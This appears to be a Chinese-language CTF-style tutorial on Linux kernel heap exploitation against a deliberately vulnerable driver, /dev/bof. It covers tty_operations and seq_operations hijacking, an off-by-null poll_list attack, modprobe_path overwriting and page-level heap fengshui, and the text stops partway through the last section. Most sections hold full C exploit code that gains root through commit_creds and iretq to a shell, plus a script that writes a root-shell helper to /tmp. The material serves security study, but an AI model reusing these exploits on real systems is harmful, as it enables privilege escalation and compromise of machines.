1 2 3 4 5 6 7 8 9 10 11 12 13 #!/bin/bash qemu-system-x86_64 \ -initrd rootfs.img \ -kernel bzImage \ -m 512M \ -nographic \ -append 'console=ttyS0 root=/dev/ram oops=panic panic=1 quiet nokaslr' \ -monitor /dev/null \ -s \ -cpu kvm64 \ -smp cores=1,threads=1 \ --nographic
利用思路 在 /dev 下有一个伪终端设备 ptmx ,在我们打开这个设备时内核中会创建一个 tty_struct 结构体,
1 2 3 ptmx_open (drivers/tty/pty.c) -> tty_init_dev (drivers/tty/tty_io.c) -> alloc_tty_struct (drivers/tty/tty_io.c)
tty 的结构体 tty_srtuct 定义在 linux/tty.h 中。其中 ops 项(64bit 下位于 结构体偏移 0x18 处)指向一个存放 tty 相关操作函数的函数指针的结构体 tty_operations 。其魔数为0x5401
1 2 3 4 5 6 7 8 9 10 11 12 13 14 #define TTY_MAGIC 0x5401 struct tty_struct { ... const struct tty_operations *ops ; ... } struct tty_operations { ... int (*ioctl)(struct tty_struct *tty, unsigned int cmd, unsigned long arg); ... };
使用 tty 设备的前提是挂载了 ptmx 设备。
1 2 3 mkdir /dev/pts mount -t devpts none /dev/pts chmod 777 /dev/ptmx
所以我们只需要劫持 tty_ops 的某个可触发的操作即可,将其劫持到 get_root 函数处。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 #include <sys/wait.h> #include <assert.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ioctl.h> #include <sys/mman.h> #include <unistd.h> #define BOF_MALLOC 5 #define BOF_FREE 7 #define BOF_EDIT 8 #define BOF_READ 9 void *(*commit_creds)(void *) = (void *) 0xffffffff810a1340 ;size_t init_cred = 0xFFFFFFFF81E496C0 ;void get_shell () { system("/bin/sh" ); } unsigned long user_cs, user_rflags, user_rsp, user_ss, user_rip = (size_t ) get_shell;void save_status () { __asm__( "mov user_cs, cs;" "mov user_ss, ss;" "mov user_rsp, rsp;" "pushf;" "pop user_rflags;" ); puts ("[*]status has been saved." ); } size_t kernel_offset;void get_root () { __asm__( "mov rbx, [rsp + 8];" "mov kernel_offset, rbx;" ); kernel_offset -= 0xffffffff814f604f ; commit_creds = (void *) ((size_t ) commit_creds + kernel_offset); init_cred = (void *) ((size_t ) init_cred + kernel_offset); commit_creds(init_cred); __asm__( "swapgs;" "push user_ss;" "push user_rsp;" "push user_rflags;" "push user_cs;" "push user_rip;" "iretq;" ); } struct param { size_t len; char *buf; long long idx; }; int main (int argc, char const *argv[]) { save_status(); size_t fake_tty_ops[] = { 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , get_root }; struct param p = {0x2e0 , malloc (0x2e0 ), 0 }; printf ("[*]p_addr==>%p\n" , &p); int bof_fd = open("/dev/bof" , O_RDWR); p.len = 0x2e0 ; ioctl(bof_fd, BOF_MALLOC, &p); memset (p.buf, '\xff' , 0x2e0 ); ioctl(bof_fd, BOF_EDIT, &p); ioctl(bof_fd, BOF_FREE, &p); int ptmx_fd = open("/dev/ptmx" , O_RDWR); p.len = 0x20 ; ioctl(bof_fd, BOF_READ, &p); printf ("[*]magic_code==> %p -- %p\n" , &p.buf[0 ], *(size_t *)&p.buf[0 ]); printf ("[*]tty____ops==> %p -- %p\n" , &p.buf[0x18 ], *(size_t *)&p.buf[0x18 ]); *(size_t *)&p.buf[0x18 ] = &fake_tty_ops; ioctl(bof_fd, BOF_EDIT, &p); ioctl(ptmx_fd, 0 , 0 ); return 0 ; }
seq_operations 劫持 boot.sh
1 2 3 4 5 6 7 8 9 10 11 12 13 #!/bin/bash qemu-system-x86_64 \ -initrd rootfs.img \ -kernel bzImage \ -m 512M \ -nographic \ -append 'console=ttyS0 root=/dev/ram oops=panic panic=1 quiet kaslr' \ -monitor /dev/null \ -s \ -cpu kvm64 \ -smp cores=1,threads=1 \ --nographic
利用思路 seq_operations 结构如下,该结构在打开 /proc/self/stat 时从 kmalloc-32 中分配。
1 2 3 4 5 6 struct seq_operations { void * (*start) (struct seq_file *m, loff_t *pos); void (*stop) (struct seq_file *m, void *v); void * (*next) (struct seq_file *m, void *v, loff_t *pos); int (*show) (struct seq_file *m, void *v); };
调用读取 stat 文件时会调用 seq_operations 的 start 函数指针。
1 2 3 4 5 6 ssize_t seq_read (struct file *file, char __user *buf, size_t size, loff_t *ppos) { struct seq_file *m = file->private_data; ... p = m->op->start(m, &pos); ...
当我们在 heap_bof 驱动分配 0x20 大小的 object 后打开大量的 stat 文件就有很大概率在 heap_bof 分配的 object 的溢出范围内存在 seq_operations 结构体。由于这道题关闭了 SMEP,SMAP 和 KPTI 保护,因此我们可以覆盖 start 函数指针为用户空间的提权代码实现提权。至于 KASLR 可以通过泄露栈上的数据绕过。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <sys/ioctl.h> #include <unistd.h> #include <string.h> struct param { size_t len; char *buf; long long idx; }; const int SEQ_NUM = 0x200 ;const int DATA_SIZE = 0x20 * 8 ;#define BOF_MALLOC 5 #define BOF_FREE 7 #define BOF_EDIT 8 #define BOF_READ 9 void get_shell () { system("/bin/sh" ); } size_t user_cs, user_rflags, user_sp, user_ss, user_rip = (size_t ) get_shell;void save_status () { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts ("[*] status has been saved." ); } void *(*commit_creds)(void *) = (void *) 0xFFFFFFFF810A1340 ;void *init_cred = (void *) 0xFFFFFFFF81E496C0 ;size_t kernel_offset;void get_root () { __asm__( "mov rax, [rsp + 8];" "mov kernel_offset, rax;" ); kernel_offset -= 0xffffffff81229378 ; commit_creds = (void *) ((size_t ) commit_creds + kernel_offset); init_cred = (void *) ((size_t ) init_cred + kernel_offset); commit_creds(init_cred); __asm__( "swapgs;" "push user_ss;" "push user_sp;" "push user_rflags;" "push user_cs;" "push user_rip;" "iretq;" ); } int main () { save_status(); int bof_fd = open("dev/bof" , O_RDWR); if (bof_fd < 0 ) { puts ("[-] Failed to open bof." ); exit (-1 ); } struct param p = {0x20 , malloc (0x20 ), 0 }; for (int i = 0 ; i < 0x40 ; i++) { ioctl(bof_fd, BOF_MALLOC, &p); } memset (p.buf, '\xff' , p.len); ioctl(bof_fd, BOF_EDIT, &p); int seq_fd[SEQ_NUM]; for (int i = 0 ; i < SEQ_NUM; i++) { seq_fd[i] = open("/proc/self/stat" , O_RDONLY); if (seq_fd[i] < 0 ) { puts ("[-] Failed to open stat." ); } } puts ("[*] seq_operations spray finished." ); p.len = DATA_SIZE; p.buf = malloc (DATA_SIZE); p.idx = 0 ; for (int i = 0 ; i < DATA_SIZE; i += sizeof (size_t )) { *(size_t *) &p.buf[i] = (size_t ) get_root; } ioctl(bof_fd, BOF_EDIT, &p); puts ("[*] Heap overflow finished." ); for (int i = 0 ; i < SEQ_NUM; i++) { read(seq_fd[i], p.buf, 1 ); } return 0 ; }
off by null 现在我们假设这道题没有提供free,并且只有单字节溢出,并且溢出的单字节只能是NULL,那么我们应该怎麼去利用呢?
利用思路 boot.sh
1 2 3 4 5 6 7 8 9 10 11 12 13 #!/bin/bash qemu-system-x86_64 \ -initrd rootfs.img \ -kernel bzImage \ -m 1G \ -append 'console=ttyS0 root=/dev/ram oops=panic panic=1 quiet nokaslr' \ -monitor /dev/null \ -s \ -cpu kvm64 \ -smp cores=1,threads=2 \ --nographic
poll系统调用
1 2 3 4 5 6 int poll (struct pollfd *fds, nfds_t nfds, int timeout) ;
poll_list 结构体对象是在调用 poll() 时分配,该调用可以监视 1 个或多个文件描述符的活动。
1 2 3 4 5 6 7 8 9 10 11 struct pollfd { int fd; short events; short revents; }; struct poll_list { struct poll_list *next ; int len; struct pollfd entries []; };
poll_list 结构如下图所示,前 30 个 poll_fd 在栈上,后面的都在堆上,最多 510 个 poll_fd 在一个堆上的 poll_list 上,堆上的 poll_list 最大为 0x1000。
poll_list 分配/释放
do_sys_poll 函数完成 poll_list 的分配和释放。poll_list 的是超时自动释放的,我们可以指定 poll_list 的释放时间。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 #define POLL_STACK_ALLOC 256 #define PAGE_SIZE 4096 #define POLLFD_PER_PAGE ((PAGE_SIZE-sizeof(struct poll_list)) / sizeof(struct pollfd)) #define N_STACK_PPS ((sizeof(stack_pps) - sizeof(struct poll_list)) / sizeof(struct pollfd)) [...] static int do_sys_poll (struct pollfd __user *ufds, unsigned int nfds, struct timespec64 *end_time) { struct poll_wqueues table ; int err = -EFAULT, fdcount, len; long stack_pps[POLL_STACK_ALLOC/sizeof (long )]; struct poll_list *const head = (struct poll_list *)stack_pps; struct poll_list *walk = head; unsigned long todo = nfds; if (nfds > rlimit(RLIMIT_NOFILE)) return -EINVAL; len = min_t (unsigned int , nfds, N_STACK_PPS); for (;;) { walk->next = NULL ; walk->len = len; if (!len) break ; if (copy_from_user(walk->entries, ufds + nfds-todo, sizeof (struct pollfd) * walk->len)) goto out_fds; todo -= walk->len; if (!todo) break ; len = min(todo, POLLFD_PER_PAGE); walk = walk->next = kmalloc(struct_size(walk, entries, len), GFP_KERNEL); if (!walk) { err = -ENOMEM; goto out_fds; } } poll_initwait(&table); fdcount = do_poll(head, &table, end_time); poll_freewait(&table); if (!user_write_access_begin(ufds, nfds * sizeof (*ufds))and) goto out_fds; for (walk = head; walk; walk = walk->next) { struct pollfd *fds = walk->entries; int j; for (j = walk->len; j; fds++, ufds++, j--) unsafe_put_user(fds->revents, &ufds->revents, Efault); } user_write_access_end(); err = fdcount; out_fds: walk = head->next; while (walk) { struct poll_list *pos = walk; walk = walk->next; kfree(pos); } return err; Efault: user_write_access_end(); err = -EFAULT; goto out_fds; }
我们可以去找到一些结构体,其头 8 字节是一个指针,然后利用 off by null 去损坏该指针,比如使得 0xXXXXa0 变成 0xXXXX00,然后就可以考虑利用堆喷去构造 UAF 了。
详细流程
首先分配 kmalloc-4096 大小的结构题在ptr[0];
然后构造这样的poll_list结构体。
利用off-by-null将poll_list->next的最后一个字节改为空。然后大量分配kmalloc-32的obj内存,这里只所以是 32 字节大小是因为要与后面的 seq_operations 配合,并且 32 大小的 object 其低字节是可能为 \x00 的,其低字节为 0x20、0x40、0x80 、0xa0、0xc0、0xe0、0x00。运气好可以被我们篡改后的poll_list->next指到。但对于这道题来说我们没有足够的堆块用于堆喷,所以成功率是极低的。
等待poll_list线程执行完毕,并且我们分配的kmalloc-32被错误释放,分配大量的seq_operations,运气好可以正好被分配到我们释放的kmalloc-32,形成UAF,这样我们就可以利用UAF修改seq_operations->start指针指向提权代码。
提权可以参考上一篇文章,利用栈上的残留值来bypass kaslr。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 #ifndef _GNU_SOURCE #define _GNU_SOURCE #endif #include <asm/ldt.h> #include <assert.h> #include <ctype.h> #include <errno.h> #include <fcntl.h> #include <linux/keyctl.h> #include <linux/userfaultfd.h> #include <poll.h> #include <pthread.h> #include <sched.h> #include <semaphore.h> #include <signal.h> #include <stdbool.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ioctl.h> #include <sys/ipc.h> #include <sys/mman.h> #include <sys/msg.h> #include <sys/prctl.h> #include <sys/sem.h> #include <sys/shm.h> #include <sys/socket.h> #include <sys/syscall.h> #include <sys/types.h> #include <sys/wait.h> #include <sys/xattr.h> #include <unistd.h> #include <sys/sysinfo.h> #define BOF_MALLOC 5 #define BOF_FREE 7 #define BOF_EDIT 8 #define BOF_READ 9 #define SEQ_NUM (2048 + 128) #define TTY_NUM 72 #define PIPE_NUM 1024 #define KEY_NUM 199 char buf[0x20 ];int bof_fd;int key_id[KEY_NUM];#define N_STACK_PPS 30 #define POLL_NUM 0x1000 #define PAGE_SIZE 0x1000 struct param { size_t len; char *buf; unsigned long idx; }; size_t user_cs, user_rflags, user_sp, user_ss;void save_status () { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts ("[*] status has been saved." ); } void get_shell (void ) { system("/bin/sh" ); } void qword_dump (char *desc, void *addr, int len) { uint64_t *buf64 = (uint64_t *) addr; uint8_t *buf8 = (uint8_t *) addr; if (desc != NULL ) { printf ("[*] %s:\n" , desc); } for (int i = 0 ; i < len / 8 ; i += 4 ) { printf (" %04x" , i * 8 ); for (int j = 0 ; j < 4 ; j++) { i + j < len / 8 ? printf (" 0x%016lx" , buf64[i + j]) : printf (" " ); } printf (" " ); for (int j = 0 ; j < 32 && j + i * 8 < len; j++) { printf ("%c" , isprint (buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.' ); } puts ("" ); } } struct callback_head { struct callback_head *next ; void (*func)(struct callback_head *head); } __attribute__((aligned(sizeof (void *)))); #define rcu_head callback_head #define __aligned(x) __attribute__((__aligned__(x))) typedef unsigned long long u64;struct user_key_payload { struct rcu_head rcu ; unsigned short datalen; char data[0 ] __aligned(__alignof__(u64)); }; int key_alloc (int id, void *payload, int payload_len) { char description[0x10 ] = {}; sprintf (description, "pwn_%d" , id); return key_id[id] = syscall(__NR_add_key, "user" , description, payload, payload_len - sizeof (struct user_key_payload), KEY_SPEC_PROCESS_KEYRING); } int key_update (int id, void *payload, size_t plen) { return syscall(__NR_keyctl, KEYCTL_UPDATE, key_id[id], payload, plen); } int key_read (int id, void *bufer, size_t buflen) { return syscall(__NR_keyctl, KEYCTL_READ, key_id[id], bufer, buflen); } int key_revoke (int id) { return syscall(__NR_keyctl, KEYCTL_REVOKE, key_id[id], 0 , 0 , 0 ); } int key_unlink (int id) { return syscall(__NR_keyctl, KEYCTL_UNLINK, key_id[id], KEY_SPEC_PROCESS_KEYRING); } pthread_t tid[40 ];typedef struct { int nfds, timer; } poll_args; struct poll_list { struct poll_list *next ; int len; struct pollfd entries []; }; void * alloc_poll_list (void *args) { int nfds = ((poll_args *) args)->nfds; int timer = ((poll_args *) args)->timer; struct pollfd *pfds = calloc (nfds, sizeof (struct pollfd)); for (int i = 0 ; i < nfds; i++) { pfds[i].fd = open("/etc/passwd" , O_RDONLY); pfds[i].events = POLLERR; } poll(pfds, nfds, timer); } void * create_poll_list (size_t size, int timer, int i) { poll_args *args = calloc (1 , sizeof (poll_args)); args->nfds = (size - (size + PAGE_SIZE - 1 ) / PAGE_SIZE * sizeof (struct poll_list)) / sizeof (struct pollfd) + N_STACK_PPS; args->timer = timer; pthread_create(&tid[i], NULL , alloc_poll_list, args); } struct list_head { struct list_head *next , *prev ; }; struct tty_file_private { struct tty_struct *tty ; struct file *file ; struct list_head list ; }; struct page ;struct pipe_inode_info ;struct pipe_buf_operations ;struct pipe_bufer { struct page *page ; unsigned int offset, len; const struct pipe_buf_operations *ops ; unsigned int flags; unsigned long private; }; struct pipe_buf_operations { int (*confirm)(struct pipe_inode_info *, struct pipe_bufer *); void (*release)(struct pipe_inode_info *, struct pipe_bufer *); int (*try_steal)(struct pipe_inode_info *, struct pipe_bufer *); int (*get)(struct pipe_inode_info *, struct pipe_bufer *); }; void *(*commit_creds)(void *) = (void *) 0xFFFFFFFF810A1340 ;void *init_cred = (void *) 0xFFFFFFFF81E496C0 ;size_t user_rip = (size_t ) get_shell;size_t kernel_offset;void get_root () { __asm__( "mov rax, [rsp + 8];" "mov kernel_offset, rax;" ); kernel_offset -= 0xffffffff81229378 ; commit_creds = (void *) ((size_t ) commit_creds + kernel_offset); init_cred = (void *) ((size_t ) init_cred + kernel_offset); commit_creds(init_cred); __asm__( "swapgs;" "push user_ss;" "push user_sp;" "push user_rflags;" "push user_cs;" "push user_rip;" "iretq;" ); } int main () { save_status(); signal(SIGSEGV, (void *) get_shell); bof_fd = open("dev/bof" , O_RDWR); int seq_fd[SEQ_NUM]; printf ("[*] try to alloc_kmalloc-4096\n" ); size_t * mem = malloc (0x1010 ); memset (mem, '\xff' , 0x1010 ); struct param p = {0x1000 , (char *)mem, 0 }; ioctl(bof_fd, BOF_MALLOC, &p); printf ("[*] try to spary kmalloc-32\n" ); p.len = 0x20 ; for (int i = 1 ; i < 20 ; ++i) { p.idx = i; memset (mem, i, 0x20 ); memset (mem, 0 , 0x18 ); ioctl(bof_fd, BOF_MALLOC, &p); ioctl(bof_fd, BOF_EDIT, &p); } printf ("[*] try to alloc_poll_list\n" ); for (int i = 0 ; i < 14 ; ++i) { create_poll_list(PAGE_SIZE + sizeof (struct poll_list) + sizeof (struct pollfd), 3000 , i); } printf ("[*] try to spary kmalloc-32\n" ); p.len = 0x20 ; for (int i = 20 ; i < 40 ; ++i) { p.idx = i; memset (mem, i, 0x20 ); memset (mem, 0 , 0x18 ); ioctl(bof_fd, BOF_MALLOC, &p); ioctl(bof_fd, BOF_EDIT, &p); } sleep(1 ); p.len = 0x1001 ; p.idx = 0 ; memset (mem, '\x00' , 0x1001 ); ioctl(bof_fd, BOF_EDIT, &p); void *res; for (int i = 0 ; i < 14 ; ++i) { printf ("[*] wating for poll end\n" ); pthread_join(tid[i], &res); } for (int i = 0 ; i < 256 ; ++i) { seq_fd[i] = open("/proc/self/stat" , O_RDONLY); } sleep(1 ); for (int i = 1 ; i < 40 ; ++i) { p.idx = i; p.len = 0x20 ; ioctl(bof_fd, BOF_READ, &p); printf ("[%d->0] p->buf == %p\n" , i, (size_t *)mem[0 ]); printf ("[%d->1] p->buf == %p\n" , i, (size_t *)mem[1 ]); printf ("[%d->2] p->buf == %p\n" , i, (size_t *)mem[2 ]); printf ("[%d->3] p->buf == %p\n" , i, (size_t *)mem[3 ]); mem[0 ] = (size_t *)get_root; mem[1 ] = (size_t *)get_root; mem[2 ] = (size_t *)get_root; mem[3 ] = (size_t *)get_root; ioctl(bof_fd, BOF_EDIT, &p); } for (int i = 1 ; i < 40 ; ++i) { p.idx = i; p.len = 0x20 ; ioctl(bof_fd, BOF_READ, &p); printf ("[%d->0] p->buf == %p\n" , i, (size_t *)mem[0 ]); printf ("[%d->1] p->buf == %p\n" , i, (size_t *)mem[1 ]); printf ("[%d->2] p->buf == %p\n" , i, (size_t *)mem[2 ]); printf ("[%d->3] p->buf == %p\n" , i, (size_t *)mem[3 ]); } for (int i = 0 ; i < 256 ; i++) { read(seq_fd[i], p.buf, 1 ); } return 0 ; }
Arbitrary Address Allocation 利用思路 通过 uaf 修改 object 的 free list 指针实现任意地址分配。与 glibc 不同的是,内核的 slub 堆管理器缺少检查,因此对要分配的目标地址要求不高,不过有一点需要注意:当我们分配到目标地址时会把目标地址前 8 字节的数据会被写入 freelist,而这通常并非一个有效的地址,从而导致 kernel panic,因此在任意地址分配时最好确保目标 object 的 free list 字段为 NULL 。
当能够任意地址分配的时候,与 glibc 改 hook 类似,在内核中通常修改的是 modprobe_path 。modprobe_path 是内核中的一个变量,其值为 /sbin/modprobe ,因此对于缺少符号的内核文件可以通过搜索 /sbin/modprobe 字符串的方式定位这个变量。
当我们尝试去执行(execve)一个非法的文件(file magic not found),内核会经历如下调用链:
1 2 3 4 5 6 7 8 9 entry_SYSCALL_64() sys_execve() do_execve() do_execveat_common() bprm_execve() exec_binprm() search_binary_handler() __request_module() call_modprobe()
其中 call_modprobe() 定义于 kernel/kmod.c,我们主要关注这部分代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 static int call_modprobe (char *module_name, int wait) { argv[0 ] = modprobe_path; argv[1 ] = "-q" ; argv[2 ] = "--" ; argv[3 ] = module_name; argv[4 ] = NULL ; info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL, NULL , free_modprobe_argv, NULL ); if (!info) goto free_module_name; return call_usermodehelper_exec(info, wait | UMH_KILLABLE);
在这里调用了函数 call_usermodehelper_exec() 将 modprobe_path 作为可执行文件路径以 root 权限将其执行。 我们不难想到的是:若是我们能够劫持 modprobe_path,将其改写为我们指定的恶意脚本的路径,随后我们再执行一个非法文件,内核将会以 root 权限执行我们的恶意脚本。
或者分析vmlinux即可(对于一些没有call_modprobe()符号的直接交叉引用即可)。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 __int64 _request_module( char a1, __int64 a2, double a3, double a4, double a5, double a6, double a7, double a8, double a9, double a10, ...) { ...... if ( v19 ) { ...... v21 = call_usermodehelper_setup( (__int64)&byte_FFFFFFFF82444700, (__int64)v18, (__int64)&off_FFFFFFFF82444620, 3264 , 0LL , (__int64)free_modprobe_argv, 0LL ); ...... } .data:FFFFFFFF82444700 byte_FFFFFFFF82444700 ; DATA XREF: __request_module:loc_FFFFFFFF8108C6D8↑r .data:FFFFFFFF82444700 db 2F h ; / ; __request_module+14B ↑o ... .data:FFFFFFFF82444701 db 73 h ; s .data:FFFFFFFF82444702 db 62 h ; b .data:FFFFFFFF82444703 db 69 h ; i .data:FFFFFFFF82444704 db 6 Eh ; n .data:FFFFFFFF82444705 db 2F h ; / .data:FFFFFFFF82444706 db 6 Dh ; m .data:FFFFFFFF82444707 db 6F h ; o .data:FFFFFFFF82444708 db 64 h ; d .data:FFFFFFFF82444709 db 70 h ; p .data:FFFFFFFF8244470A db 72 h ; r .data:FFFFFFFF8244470B db 6F h ; o .data:FFFFFFFF8244470C db 62 h ; b .data:FFFFFFFF8244470D db 65 h ; e .data:FFFFFFFF8244470E db 0
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 #include "src/pwn_helper.h" #define BOF_MALLOC 5 #define BOF_FREE 7 #define BOF_WRITE 8 #define BOF_READ 9 size_t modprobe_path = 0xFFFFFFFF81E48140 ;size_t seq_ops_start = 0xffffffff81228d90 ;struct param { size_t len; size_t *buf; long long idx; }; void alloc_buf (int fd, struct param* p) { printf ("[+] kmalloc len:%lu idx:%lld\n" , p->len, p->idx); ioctl(fd, BOF_MALLOC, p); } void free_buf (int fd, struct param* p) { printf ("[+] kfree len:%lu idx:%lld\n" , p->len, p->idx); ioctl(fd, BOF_FREE, p); } void read_buf (int fd, struct param* p) { printf ("[+] copy_to_user len:%lu idx:%lld\n" , p->len, p->idx); ioctl(fd, BOF_READ, p); } void write_buf (int fd, struct param* p) { printf ("[+] copy_from_user len:%lu idx:%lld\n" , p->len, p->idx); ioctl(fd, BOF_WRITE, p); } int main () { size_t * buf = malloc (0x500 ); struct param p = {0x20 , buf, 0 }; printf ("[+] user_buf : %p\n" , p.buf); int bof_fd = open("/dev/bof" , O_RDWR); if (bof_fd < 0 ) { puts (RED "[-] Failed to open bof." NONE); exit (-1 ); } printf (YELLOW "[*] try to leak kbase\n" NONE); alloc_buf(bof_fd, &p); free_buf(bof_fd, &p); int seq_fd = open("/proc/self/stat" , O_RDONLY); read_buf(bof_fd, &p); qword_dump("leak seq_ops" , buf, 0x20 ); size_t kernel_offset = buf[0 ] - seq_ops_start; printf (YELLOW "[*] kernel_offset %p\n" NONE, (void *)kernel_offset); modprobe_path += kernel_offset; printf (LIGHT_BLUE "[*] modprobe_path addr : %p\n" NONE, (void *)modprobe_path); p.len = 0xa8 ; alloc_buf(bof_fd, &p); free_buf(bof_fd, &p); read_buf(bof_fd, &p); buf[0 ] = modprobe_path - 0x20 ; write_buf(bof_fd, &p); alloc_buf(bof_fd, &p); alloc_buf(bof_fd, &p); read_buf(bof_fd, &p); qword_dump("leak modprobe_path" , buf, 0x30 ); strcpy ((char *) &buf[4 ], "/tmp/shell.sh\x00" ); write_buf(bof_fd, &p); read_buf(bof_fd, &p); qword_dump("leak modprobe_path" , buf, 0x30 ); if (open("/shell.sh" , O_RDWR) < 0 ) { system("echo '#!/bin/sh' >> /tmp/shell.sh" ); system("echo 'setsid /bin/cttyhack setuidgid 0 /bin/sh' >> /tmp/shell.sh" ); system("chmod +x /tmp/shell.sh" ); } system("echo -e '\\xff\\xff\\xff\\xff' > /tmp/fake" ); system("chmod +x /tmp/fake" ); system("/tmp/fake" ); return 0 ; }
Page-level Fengshui 利用思路 Cross-Cache-Overflow 实际上是针对 buddy system 的利用手法。
slub allocator 底层逻辑是向 buddy system 请求页面后再划分成特定大小 object 返还给上层调用者
→ 内存中用作不同 kmem_cache 的页面在内存上是有可能相邻的。
若我们的漏洞对象存在于页面 A,溢出目标对象存在于页面 B,且 A、B两页面相邻,则我们便有可能实现跨越不同 kmem_cache 之间的堆溢出。
首先让我们重新审视 slub allocator 向 buddy system 请求页面的过程,当 freelist page 已经耗空且 partial 链表也为空时(或者 kmem_cache 刚刚创建后进行第一次分配时),其会向 buddy system 申请页面:
接下来让我们重新审视 buddy system ,其基本原理就是以 2 的 order 次幂张内存页作为分配粒度,相同 order 间空闲页面构成双向链表,当低阶 order 的页面不够用时便会从高阶 order 取一份连续内存页拆成两半,其中一半挂回当前请求 order 链表,另一半返还给上层调用者;下图为以 order 2 为例的 buddy system 页面分配基本原理:
我们不难想到的是:从更高阶 order 拆分成的两份低阶 order 的连续内存页是物理连续的 ,由此我们可以:
向 buddy system 请求两份连续的内存页。
释放其中一份内存页,在 vulnerable kmem_cache 上堆喷,让其取走这份内存页。
释放另一份内存页,在 victim kmem_cache 上堆喷,让其取走这份内存页。
此时我们便有可能溢出到其他的内核结构体上,从而完成 cross-cache overflow 。
注意 slub 申请的 object 位于线性映射区,因此溢出修改的是物理地址相邻的内存页。而 buddy system 的特性可以保证两个物理页物理地址相邻。
在实际情况中我们无法准确控制 buddy system ,因此这一步骤改为:
向 buddy system 请求大量的内存页
释放其中一半内存页,在 vulnerable kmem_cache 上堆喷,让其取走这些内存页
释放另一半内存页,在 victim kmem_cache 上堆喷,让其取走这些内存页
这样我们有很大概率构造出上面那种情况,从而可以溢出到其他的内核结构体上完成 cross-cache overflow 。
使用 setsockopt 与 pgv 完成页级内存占位与堆风水
当我们创建一个 protocol 为 PF_PACKET 的 socket 之后,先调用 setsockopt() 将 PACKET_VERSION 设为 TPACKET_V1 / TPACKET_V2,再调用 setsockopt() 提交一个 PACKET_TX_RING ,此时便存在如下调用链:
1 2 3 4 5 __sys_setsockopt() sock->ops->setsockopt() packet_setsockopt() packet_set_ring() alloc_pg_vec()
在 alloc_pg_vec() 中会创建一个 pgv 结构体,用以分配 tp_block_nr 份 2 order 张内存页,其中 order 由 tp_block_size 决定:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 static struct pgv *alloc_pg_vec (struct tpacket_req *req, int order) { unsigned int block_nr = req->tp_block_nr; struct pgv *pg_vec ; int i; pg_vec = kcalloc(block_nr, sizeof (struct pgv), GFP_KERNEL | __GFP_NOWARN); if (unlikely(!pg_vec)) goto out; for (i = 0 ; i < block_nr; i++) { pg_vec[i].buffer = alloc_one_pg_vec_page(order); if (unlikely(!pg_vec[i].buffer)) goto out_free_pgvec; } out: return pg_vec; out_free_pgvec: free_pg_vec(pg_vec, order, block_nr); pg_vec = NULL ; goto out; }
在 alloc_one_pg_vec_page() 中会直接调用 __get_free_pages() 向 buddy system 请求内存页,因此我们可以利用该函数进行大量的页面请求:
